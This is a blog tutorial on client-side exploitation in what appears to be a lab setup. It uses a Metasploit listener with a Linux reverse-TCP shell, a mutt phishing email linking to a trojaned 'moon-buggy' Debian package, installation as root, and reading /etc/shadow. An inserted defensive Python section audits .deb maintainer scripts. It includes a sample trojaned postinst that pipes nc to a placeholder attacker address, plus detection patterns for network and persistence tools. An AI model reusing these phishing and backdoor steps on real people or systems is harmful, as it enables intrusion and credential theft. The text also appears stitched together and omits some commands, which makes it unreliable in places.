Lucifer

Client Side Exploitation

In the Spear Phishing post HERE we saw how a malicious file can be delivered to a system by tricking a user into downloading and running a malicious executable. In this post, we will see how a malicious Debian package, when opened and installed on a target system, can provide an attacker with remote access to the system. So, let's see how we can do client-side exploitation step by step:

Step 1: Starting Metasploit Framework

First, we need to set up a listener that will wait for incoming connections. Launch the Metasploit Framework by entering the following command:

msfconsole -L

Step 2: Selecting Module

For this post we will use the Generic Payload Handler, which provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework. Select the module by entering the following command:

use exploit/multi/handler

Step 3: Configuring Listener

Now let's configure the module to listen on TCP port 4444 on our local IP and select the shell/reverse_tcp payload:

set LPORT 4444

set PAYLOAD linux/x86/shell/reverse_tcp

Step 4: Starting Listener

Now start the listener by entering exploit.


Now open a new terminal tab with Ctrl + Shift + T and switch to it.

Step 5: Sending Phishing Email

For this attack we will send a download link rather than an attachment. The following command will send an invitation to download a game from a website:

echo 'Check out this cool game! Download from <a href="http://skillsetlocal.com/moon-buggy.deb">here</a> for FREE.' | mutt -e 'set content_type=text/html' -s 'Game Download' -- admin@skillsetlocal.com

Step 6: Checking Email

We will use mutt again to read the email:


Step 7: Reading Email

You should see our email in the inbox. Hit Enter to open it.

Next, hit v to view the attachment (which, in this case, is just the body of the email). Hit Enter to open it.

You should see our phishing email message with the download link highlighted in yellow.

Step 8: Downloading File

Hit Enter to follow the link, then hit d to download.

Next, use the down arrow key to select Save to disk and hit Enter.

Hit Enter again to accept the default filename.

Step 9: Installing Package

Exit mutt by hitting q, i, and q again (or press Ctrl+C and then Enter to confirm). Now let's install the downloaded package with the following command:

sudo dpkg -i moon-buggy.deb

Do you see anything unusual? No. The package installs as normal, without raising any red flags. Now let's return to our listener.
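The reason nothing looks unusual is that dpkg -i runs whatever maintainer scripts (preinst, postinst, prerm, postrm) the package ships, as root, without showing them to the user. The check a defender wants before installing a package from an untrusted link is to pull those scripts out and read them. The following is an added example, not code from the original post: it parses the .deb container itself (an ar archive holding debian-binary, control.tar.* and data.tar.*), extracts the maintainer scripts from control.tar.*, and flags lines that give an install script network or persistence capability. The heuristic list, the sample package builder, and both sample postinst scripts (including the ATTACKER_IP_PLACEHOLDER address) are constructed for this illustration.

```python
"""Added example: inspect a .deb's maintainer scripts before installing it.

A Debian package is an 'ar' archive holding debian-binary, control.tar.* and data.tar.*.
dpkg -i runs the maintainer scripts in control.tar.* as root, so they are the first thing to read.
"""
import io
import re
import tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

# Constructed heuristics: capabilities a game's install script has no business having.
# A hit is a reason to read the script by hand, not proof of malice.
SUSPICIOUS = [
    (r"\b(nc|ncat|netcat|socat)\b", "raw network tool"),
    (r"\b(curl|wget)\b", "downloader"),
    (r"/dev/tcp/", "shell network redirection"),
    (r"\b(crontab|systemctl\s+enable)\b", "persistence"),
    (r"\b(nohup|setsid)\b", "detached background process"),
    (r"base64\s+(-d|--decode)", "encoded payload"),
]


def parse_ar(blob: bytes) -> dict:
    """Parse the outer 'ar' container of a .deb into {member name: bytes}."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        # dpkg pads member names with spaces; GNU ar terminates them with '/'
        name = hdr[0:16].decode("ascii").rstrip(" /")
        size = int(hdr[48:58].decode("ascii").strip())
        start = pos + 60
        members[name] = blob[start:start + size]
        pos = start + size + (size % 2)  # member data is padded to an even offset
    return members


def extract_maintainer_scripts(deb: bytes) -> dict:
    """Return {script name: text} for the maintainer scripts found in control.tar.*."""
    members = parse_ar(deb)
    control = next((n for n in members if n.startswith("control.tar")), None)
    if control is None:
        raise ValueError("no control.tar member")
    scripts = {}
    # mode "r:*" auto-detects gzip/bzip2/xz; zstd-compressed control tars need an extra decoder
    with tarfile.open(fileobj=io.BytesIO(members[control]), mode="r:*") as tar:
        for info in tar.getmembers():
            base = info.name.lstrip("./")
            if base in MAINTAINER_SCRIPTS and info.isfile():
                scripts[base] = tar.extractfile(info).read().decode("utf-8", "replace")
    return scripts


def audit_deb(deb: bytes) -> list:
    """Return (script, finding, offending line) triples; an empty list means nothing matched."""
    findings = []
    for name, text in extract_maintainer_scripts(deb).items():
        for line in text.splitlines():
            for pattern, desc in SUSPICIOUS:
                if re.search(pattern, line):
                    findings.append((name, desc, line.strip()))
    return findings


def build_sample_deb(postinst: str) -> bytes:
    """Constructed sample: a minimal .deb carrying a control file and the given postinst."""
    control_tar = io.BytesIO()
    with tarfile.open(fileobj=control_tar, mode="w:gz") as tar:
        for name, content, mode in (
            ("./control", "Package: example-game\nVersion: 1.0\nArchitecture: all\n", 0o644),
            ("./postinst", postinst, 0o755),
        ):
            data = content.encode()
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(data), mode
            tar.addfile(info, io.BytesIO(data))
    out = bytearray(b"!<arch>\n")
    for name, data in (
        ("debian-binary", b"2.0\n"),
        ("control.tar.gz", control_tar.getvalue()),
        ("data.tar.gz", b""),  # placeholder; a real package carries its files here
    ):
        # 60-byte ar header: name(16) mtime(12) uid(6) gid(6) mode(8) size(10) magic(2)
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        out += data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)


# Constructed maintainer scripts: a benign one, and one that opens a connection to a
# placeholder address on port 4444 (the listener port used in this post).
BENIGN_POSTINST = "#!/bin/sh\nset -e\nupdate-menus 2>/dev/null || true\n"
TROJANED_POSTINST = (
    "#!/bin/sh\nset -e\n"
    "nohup nc ATTACKER_IP_PLACEHOLDER 4444 >/dev/null 2>&1 &\n"
)

if __name__ == "__main__":
    for label, script in (("benign", BENIGN_POSTINST), ("trojaned", TROJANED_POSTINST)):
        print(label, audit_deb(build_sample_deb(script)) or "no findings")
```

Run against a real download, read the file with open(path, "rb") and pass the bytes to audit_deb. The heuristics are deliberately noisy: a legitimate package may well use curl in postinst, so a hit means "read this script before running dpkg -i", not "this is a trojan". The converse also holds, and is the real lesson of the post: the backdoor could equally live in a binary under data.tar.*, so a clean control tarball is not a clean package, and the only durable defence is installing from signed repositories rather than from a link in an email.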

Switch back to tab 1.

Step 10: Using Reverse Shell

Let's see what kind of access we got. Enter the following command to get the user ID:


We are running as root! To confirm, let's read the /etc/shadow file:

cat /etc/shadow

Game over. Now switch tabs again.

Step 11: Playing Game

All quiet here. The admin user can enjoy the "cool free game" while the attacker enjoys root access to the system.

Enter moon-buggy to play the game. You can see that the package is fully functional, with a Trojan added as a "bonus feature".


Also read: Spearphishing

That's it for this post. I hope you like it; please share it with your friends. More amazing stuff is waiting for you: check out the shop at Payground or visit HERE.


©2020 by Payground. Proudly created with Wix.com